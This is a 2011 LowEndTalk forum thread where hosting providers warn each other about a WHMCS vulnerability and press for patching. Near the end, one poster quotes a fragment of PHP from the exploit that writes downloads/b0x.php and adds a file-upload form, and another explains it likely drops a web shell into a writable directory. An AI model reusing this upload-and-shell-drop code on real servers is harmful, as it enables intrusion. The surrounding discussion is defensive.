Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Advertise on LowEndTalk.com
Providers, please update your WHMCS - severe security risk.
New on LowEndTalk? Please Register and read our Community Rules.

Providers, please update your WHMCS - severe security risk.

cripperzcripperz Member
edited December 2011 in General

Hi guys,

WHMCS got hit again. It causes me not to be able to recover my admin password and password was change unexpectedly.

Please refer to WHMCS forum - http://forum.whmcs.com/showthread.php?p=206522

do update your WHMCS quickly as this is a serious threat.

Comments

  • Thank you, I've just updated my test WHMCS =)

    €5 Enterprise VPS from Evolution Host
    SellSSL.com - Comodo PositiveSSL from $7 per year!

  • rm_rm_ Member
    edited December 2011

    Heh, turns out sometimes it's benificial to use providers with their own custom control panel. :)

  • @rm_ said: Heh, turns out sometimes it's benificial to use providers with their own custom control panel. :)

    What did you mean mate? I think WHMCS is a billing system, not control panel?

    €5 Enterprise VPS from Evolution Host
    SellSSL.com - Comodo PositiveSSL from $7 per year!

  • At one time, I created a huge hosting control panel using CakePHP Framework, but I replaced it with WHMCS because it was AWESOME :)

  • I dont trust whmcs or any other software that hides the code. Could have anything hidden in there. Fortantely tho i have some software that removes ioncube

  • InfinityInfinity Member, Provider

    True, but cant you decode it. The people that null the scripts must be able to do so.

    Cablestreet - London based ISP - Managed Solutions, Carrier Services, Colocation, Dedicated Servers, VMs, and more..

  • @DanielM said: Fortantely tho i have some software that removes ioncube

    Would you please share it? :P

    €5 Enterprise VPS from Evolution Host
    SellSSL.com - Comodo PositiveSSL from $7 per year!

  • Thank you for pointing this out as it seems our hosting/license provider failed to mention it :)

  • RensRens Member
    edited December 2011

    Every WHMCS client should have received a mailing about it. This issue seems to be known for a while, there were already people exploiting this in October. Worries me.

  • Yep, every direct WHMCS client does, its down to our provider who issues our WHMCS license (MDD Hosting) to tell us, which they have not.. still.

  • @VMPort said: our hosting/license provider failed to mention it

    Subscribe to the WHMCS twitter feed.

    Hostigation High Resource Hosting - SolusVM KVM VPS / Proxmox OpenVZ VPS- Low Cost Comodo SSL Certificates
  • @miTgib

    You get my point though right, i shouldnt have to? If a host is providing the license/software they should be informing customers of potential security threats.

    Or am i expecting too much :P

  • They should, but it's your responsibility to keep on top of things too. Relying on someone else is adding one unnecessary point of failure to things.

  • Sure it is, thats why i have done it myself :P I also popped a ticket into MDD telling them i think it would be a good idea to let clients know. Cos im nice :)

  • @Asim said: but I replaced it with WHMCS because it WAS awesome :)

    Fixed :)

    Actually we don't use whmcs so I wouldn't know.

    @VMPort said: You get my point though right, i shouldnt have to? If a host is providing the license/software they should be informing customers of potential security threats.

    Or am i expecting too much :P

    Nope. You just explained my entire line of work. :)

    I do wonder about the October bit up there. I know some of the scripts that we use, once a problem is made public, some times some one will pop out of the woodwork and announce that "Wait, I let you now about that months ago!" and point to a ticket or forum posting or something else.

    That's what concerns me. Seen it with Gallery, wordpress, firefox, windows, etc....

  • Ash_HawkridgeAsh_Hawkridge Member
    edited December 2011

    Just for readings sake... There response.

    We are aware, and was going to announce it but we discovered a huge issue with the patch that broke our WHMCS and we have a pending ticket with WHMCS about it. Once they resolve the issue we'll announce the patch.

    Thank you,

    Michael Denney
    MDDHosting - Professional Hosting
    http://www.mddhosting.com/
    Follow us on Twitter! http://twitter.com/MDDHosting

  • @drmike said: Actually we don't use whmcs

    Please don't say you use Platypus still

    Hostigation High Resource Hosting - SolusVM KVM VPS / Proxmox OpenVZ VPS- Low Cost Comodo SSL Certificates
  • Abacus

  • @VMPort said: Just for readings sake... There response.

    We are aware, and was going to announce it but we discovered a huge issue with the patch that broke our WHMCS and we have a pending ticket with WHMCS about it. Once they resolve the issue we'll announce the patch.

    Thank you,

    Michael Denney

    MDDHosting - Professional Hosting
    http://www.mddhosting.com/
    Follow us on Twitter! http://twitter.com/MDDHosting

    From their twitter
    MDDHosting Forums: [Critical] WHMCS Security Update Affecting All Versions http://bit.ly/sycoEx

    I know, I'm Dale Maily.

  • @DanielM
    That's basicly like running nulled software, You don't trust a company that many produces software that many million dollar companys use on a day to day basis.

    Your post is just stupid.

    AboveClouds • UK Company • UK Datacentre • UK Customer Support

    High Performance Pure SSD Cloud Hosting with a personal touch

  • @EaseVPS said: That's basicly like running nulled software, You don't trust a company that many produces software that many million dollar companys use on a day to day basis.

    Your post is just stupid.

    Just like Apple tracking their users with secret software, and billions of users...

    €5 Enterprise VPS from Evolution Host
    SellSSL.com - Comodo PositiveSSL from $7 per year!

  • @giang
    That's understandable If they do, They reserve the right to keep there software out of the eyes of the world. If i had spent billions of dollars developing a Operating system and a range of mini portable device(s) I would not want my software to be very easy to decode.

    Every company that develops software should have some callback lines in the code.

    AboveClouds • UK Company • UK Datacentre • UK Customer Support

    High Performance Pure SSD Cloud Hosting with a personal touch

  • FranciscoFrancisco Top Provider

    That's not from this bug, but rather one related to templates/etc back in October.

    Francisco

    BuyVM - Free DirectAdmin, Softaculous, & Blesta! / Anycast Support! / Windows 2008, 2012, & 2016! / Unmetered Bandwidth!
    BuyShared - Shared & Reseller Hosting / cPanel + Softaculous + CloudLinux / Pure SSD! / Free Dedicated IP Address
  • It seems somewhat harmless but I don't see what it's trying to do:

    $fo = fopen("downloads/b0x.php","w");
    fwrite($fo,$code);
    echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!'; } else { echo 'Upload GAGAL !!!'; } } ?>
    

    I'm guessing the form was to upload config files to somewhere listed in downloads/b0x.php?

  • FranciscoFrancisco Top Provider

    The code would run on the server side, so since /downloads/ is normally 777, the b0x script, likely a phpshell, would dump in there.

    Francisco

    BuyVM - Free DirectAdmin, Softaculous, & Blesta! / Anycast Support! / Windows 2008, 2012, & 2016! / Unmetered Bandwidth!
    BuyShared - Shared & Reseller Hosting / cPanel + Softaculous + CloudLinux / Pure SSD! / Free Dedicated IP Address
  • FranciscoFrancisco Top Provider

    @DotVPS said: How do i fix it? its whmcs 5?

    I'm guessing WHMCS 5 should have had it included, but I could be wrong.

    Worth logging a ticket with Matt and see what's up. The latest exploit just allows dumping of file contents. If you're on shared hosting this could be a serious problem, but i'd hope you have your billing on a VPS of sorts?

    Francisco

    BuyVM - Free DirectAdmin, Softaculous, & Blesta! / Anycast Support! / Windows 2008, 2012, & 2016! / Unmetered Bandwidth!
    BuyShared - Shared & Reseller Hosting / cPanel + Softaculous + CloudLinux / Pure SSD! / Free Dedicated IP Address
  • FranciscoFrancisco Top Provider

    You should get a 256MB KVM from us if anything. If you use lighttpd instead of apache you should have no issues keeping up with even huge rushes.

    Francisco

    BuyVM - Free DirectAdmin, Softaculous, & Blesta! / Anycast Support! / Windows 2008, 2012, & 2016! / Unmetered Bandwidth!
    BuyShared - Shared & Reseller Hosting / cPanel + Softaculous + CloudLinux / Pure SSD! / Free Dedicated IP Address
  • InfinityInfinity Member, Provider
    edited December 2011

    AFAIK. Stock is coming next year, so about a month or maybe more :P.

    Cablestreet - London based ISP - Managed Solutions, Carrier Services, Colocation, Dedicated Servers, VMs, and more..

  • FranciscoFrancisco Top Provider

    @Infinity said: AFAIK. Stock is coming next year, so about a month or maybe more :P.

    We'll have some in a week or so depending on how the .32 trials finish off. We just pushed pony7.2 to 99 so we'll see how it goes.

    The kernels have been good without any real issues even under serious load.

    Francisco

    Thanked by 1Infinity
    BuyVM - Free DirectAdmin, Softaculous, & Blesta! / Anycast Support! / Windows 2008, 2012, & 2016! / Unmetered Bandwidth!
    BuyShared - Shared & Reseller Hosting / cPanel + Softaculous + CloudLinux / Pure SSD! / Free Dedicated IP Address
Sign In or Register to comment.